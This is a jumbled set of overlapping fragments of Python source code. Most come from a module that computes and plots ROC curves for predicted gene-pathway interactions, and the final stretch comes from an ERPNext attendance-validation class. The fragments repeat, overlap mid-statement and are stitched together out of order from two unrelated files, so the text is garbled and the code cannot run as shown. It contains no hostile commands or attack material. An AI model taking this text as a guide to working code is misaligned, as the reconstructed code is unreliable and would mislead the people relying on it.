'YY': yy, 'XX':", "labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index,", "yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6,", "as sns from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette", "labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [ index for", "import seaborn as sns from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\")", "labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node,", "return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions =", "auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices,", "scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx =", "predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions)", "def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with multiple", "sns from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette =", "scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy)", "* (n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 =", "indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node", "= { gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for", "{ gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene", "legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title) if output_filepath: plt.savefig(output_filepath, bbox_inches='tight')", "yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy =", "build ROC.\"\"\" import pandas as pd import numpy as np import matplotlib.pyplot as", "area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx", "title = 'Receiver Operating Characteristic' # rename method name to include AUC to", "% mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend", "for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node =", "as plt import seaborn as sns from sklearn.metrics import roc_curve, auc # seaborn", "np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df(", "(n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol)", "[ index for index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex(", ") df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize)", "time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title)", "'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6)", "for index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0)", "y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx", "index for index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices", "df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with multiple methods plot", "'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None,", "= np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name, true_interactions,", "} y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores)", "if sum(y) > 0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores,", "worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name]", "2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in labels_set", "interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores =", "legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True", "# to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY',", "numpy as np import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics", "that can be used to plot a ROC curve.\"\"\" labels = { gene", "xx, yy) else: yy = reference_xx area_under_curve = 0.5 # worst roc_df =", "Positive Rate' title = 'Receiver Operating Characteristic' # rename method name to include", "auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method", "labels) ) ) if no_self_loops: interaction_indices = [ index for index in interaction_indices", "\"\"\"Methods used to build ROC.\"\"\" import pandas as pd import numpy as np", "_get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0, 1,", "_is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions", "methods plot a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel", "Rate' title = 'Receiver Operating Characteristic' # rename method name to include AUC", "np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name,", "gene in genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) #", "_get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if", "interaction_indices = [ index for index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions", "def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol)", "genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y,", "total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) )", "figsize=(6, 6) ): \"\"\"From a df with multiple methods plot a roc curve", "y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores", "= np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve = 0.5 # worst", "used to build ROC.\"\"\" import pandas as pd import numpy as np import", "'{} '.format( method.capitalize() if method != 'INtERAcT' else method ) + 'AUC=%0.2f' %", "(e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set =", "plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0,", "= auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve", "_get_total_undirected_interactions(n): return n * (n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'):", "output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with multiple methods plot a roc", "df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False})", "pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns", "= 'Receiver Operating Characteristic' # rename method name to include AUC to show", "np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions,", "# worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points *", "no_self_loops: interaction_indices = [ index for index in interaction_indices if not _is_index_diagonal(index) ]", "for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes", "mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method != 'INtERAcT' else", "interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex(", "reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ):", "np import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import roc_curve,", "> 0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx,", "scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold", "return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a", "_is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels,", "area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method':", "labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering", "= pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY':", "rename method name to include AUC to show it in legend if auc_dict_list:", "method != 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc ) df =", "1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold = roc_curve(y, scores) print(method_name,", "if method != 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc ) df", "interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y", "number_of_roc_points) if sum(y) > 0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y,", "= predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) -", "plt import seaborn as sns from sklearn.metrics import roc_curve, auc # seaborn settings", "roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n):", "method.capitalize() if method != 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc )", "'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid", "true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y, scores =", "for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc']", "def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list(", "# seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n", "- 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return", "ylabel = 'True Positive Rate' title = 'Receiver Operating Characteristic' # rename method", "return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node == another_node", "if no_self_loops: interaction_indices = [ index for index in interaction_indices if not _is_index_diagonal(index)", "): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels)", "roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True Positive", "with multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery", ") # print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) >", ").fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y =", "roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df", "\"\"\"From a df with multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel", "df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\",", "no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index,", "method name to include AUC to show it in legend if auc_dict_list: for", "Characteristic' # rename method name to include AUC to show it in legend", "_filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [ index", "index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'):", "and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering =", "yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve = 0.5 #", "( '{} '.format( method.capitalize() if method != 'INtERAcT' else method ) + 'AUC=%0.2f'", "e1, e2 = index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set) def", "( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve", "): \"\"\"Return dataframe that can be used to plot a ROC curve.\"\"\" labels", "set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes ]) return", "pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to", "'Receiver Operating Characteristic' # rename method name to include AUC to show it", "if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] ==", "[method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df,", "n * (n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2", "threshold, xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else:", "= np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] =", "import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def", "predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to plot a ROC", "/ 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in", "labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes", "labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points)", "in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions =", "'True Positive Rate' title = 'Receiver Operating Characteristic' # rename method name to", "filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering]", "true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y, scores = _get_evaluation_on_given_labels( labels,", "Operating Characteristic' # rename method name to include AUC to show it in", "np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold = roc_curve(y, scores)", "= _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0,", "= roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve = auc(xx, yy)", "AUC to show it in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc", "[pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return", "] for gene in genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity", "y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that", "list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices =", "index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices)", "def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be", "0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy)", "= int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions))", "- len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return", ") + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) #", "a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels))", "sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1])", "can be used to plot a ROC curve.\"\"\" labels = { gene for", "= 'False Discovery Rate' ylabel = 'True Positive Rate' title = 'Receiver Operating", "_check_index(index, labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'):", "to show it in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc =", "threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve = auc(xx,", "import numpy as np import matplotlib.pyplot as plt import seaborn as sns from", "in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels)", "return n * (n - 1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1,", "method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{}", "legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method']" ]
[ "or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\",", "'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if", "{0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not", "license.txt from __future__ import unicode_literals import frappe from frappe.utils import getdate, nowdate from", "erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\", \"Half Day\"]) self.validate_attendance_date() self.validate_duplicate_record() self.check_leave_record()", "frappe.throw(_(\"Attendance can not be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) <", "unicode_literals import frappe from frappe.utils import getdate, nowdate from frappe import _ from", "set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee", "Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name", "leave_record: frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self):", "frappe.throw(_(\"Attendance date can not be less than employee's joining date\")) def validate_employee(self): emp", "= 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status", "marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where", "from `tabEmployee` where name = %s and status = 'Active'\", self.employee) if not", "from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res = frappe.db.sql(\"\"\"select name from", "if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\")) elif", "frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater", "Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status", "= %s and name != %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name))", "joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where name =", "self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee))", "and %s between from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True)", "leave_type, half_day from `tabLeave Application` where employee = %s and %s between from_date", "frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining", "Leave\" and not leave_record: frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee,", "and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status =", "from frappe.utils import getdate, nowdate from frappe import _ from frappe.model.document import Document", "and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day:", "def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\", \"Half Day\"])", "Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3.", "can not be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining):", "%s and %s between from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date),", "elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than", "Public License v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils", "Contributors # License: GNU General Public License v3. See license.txt from __future__ import", "frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and attendance_date = %s and", "docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is", "(self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0}", "%s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee", "self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on", "= 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date))", "active or does not exist\").format(self.employee)) def validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\",", "self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def", "future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be", "check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee = %s", "not be marked for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance", "from `tabLeave Application` where employee = %s and %s between from_date and to_date", "leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date))", "{1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee {0} on", "Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt", "frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select", "!= %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res: frappe.throw(_(\"Attendance for", "frappe.msgprint(_(\"Employee {0} on Half day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave'", "is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave", "employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record = frappe.db.sql(\"\"\"select leave_type, half_day", "day on {1}\").format(self.employee, self.attendance_date)) else: self.status = 'On Leave' self.leave_type = leave_record[0].leave_type frappe.msgprint(_(\"Employee", "frappe.msgprint(_(\"Employee {0} on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and", "employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if", "and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less than employee's joining", "than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from `tabEmployee` where", "validate(self): from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\", \"Half Day\"]) self.validate_attendance_date()", "and name != %s and docstatus = 1\"\"\", (self.employee, self.attendance_date, self.name)) if res:", "self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\", self.employee, \"date_of_joining\") if getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance", "nowdate from frappe import _ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name", "License v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import", "leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining =", "# License: GNU General Public License v3. See license.txt from __future__ import unicode_literals", "on Leave on {1}\").format(self.employee, self.attendance_date)) if self.status == \"On Leave\" and not leave_record:", "emp = frappe.db.sql(\"select name from `tabEmployee` where name = %s and status =", "not leave_record: frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def", "not emp: frappe.throw(_(\"Employee {0} is not active or does not exist\").format(self.employee)) def validate(self):", "name from `tabAttendance` where employee = %s and attendance_date = %s and name", "and Contributors # License: GNU General Public License v3. See license.txt from __future__", "to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status", "record found for employee {0} for {1}\").format(self.employee, self.attendance_date)) def validate_attendance_date(self): date_of_joining = frappe.db.get_value(\"Employee\",", "getdate(self.attendance_date) > getdate(nowdate()): frappe.throw(_(\"Attendance can not be marked for future dates\")) elif date_of_joining", "from erpnext.controllers.status_updater import validate_status validate_status(self.status, [\"Present\", \"Absent\", \"On Leave\", \"Half Day\"]) self.validate_attendance_date() self.validate_duplicate_record()", "dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not be less", "= frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and attendance_date = %s", "res = frappe.db.sql(\"\"\"select name from `tabAttendance` where employee = %s and attendance_date =", "and not leave_record: frappe.throw(_(\"No leave record found for employee {0} for {1}\").format(self.employee, self.attendance_date))", "res: frappe.throw(_(\"Attendance for employee {0} is already marked\").format(self.employee)) set_employee_name(self) def check_leave_record(self): leave_record =", "frappe.utils import getdate, nowdate from frappe import _ from frappe.model.document import Document from", "and attendance_date = %s and name != %s and docstatus = 1\"\"\", (self.employee,", "for future dates\")) elif date_of_joining and getdate(self.attendance_date) < getdate(date_of_joining): frappe.throw(_(\"Attendance date can not", "name from `tabEmployee` where name = %s and status = 'Active'\", self.employee) if", "%s between from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if", "frappe import _ from frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document):", "be less than employee's joining date\")) def validate_employee(self): emp = frappe.db.sql(\"select name from", "frappe.db.sql(\"select name from `tabEmployee` where name = %s and status = 'Active'\", self.employee)", "General Public License v3. See license.txt from __future__ import unicode_literals import frappe from", "1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if leave_record[0].half_day: self.status = 'Half Day' frappe.msgprint(_(\"Employee", "= frappe.db.sql(\"\"\"select leave_type, half_day from `tabLeave Application` where employee = %s and %s", "if self.status == \"On Leave\" and not leave_record: frappe.throw(_(\"No leave record found for", "from_date and to_date and docstatus = 1\"\"\", (self.employee, self.attendance_date), as_dict=True) if leave_record: if", "where name = %s and status = 'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee", "frappe.model.document import Document from erpnext.hr.utils import set_employee_name class Attendance(Document): def validate_duplicate_record(self): res =", "'Active'\", self.employee) if not emp: frappe.throw(_(\"Employee {0} is not active or does not", "and docstatus = 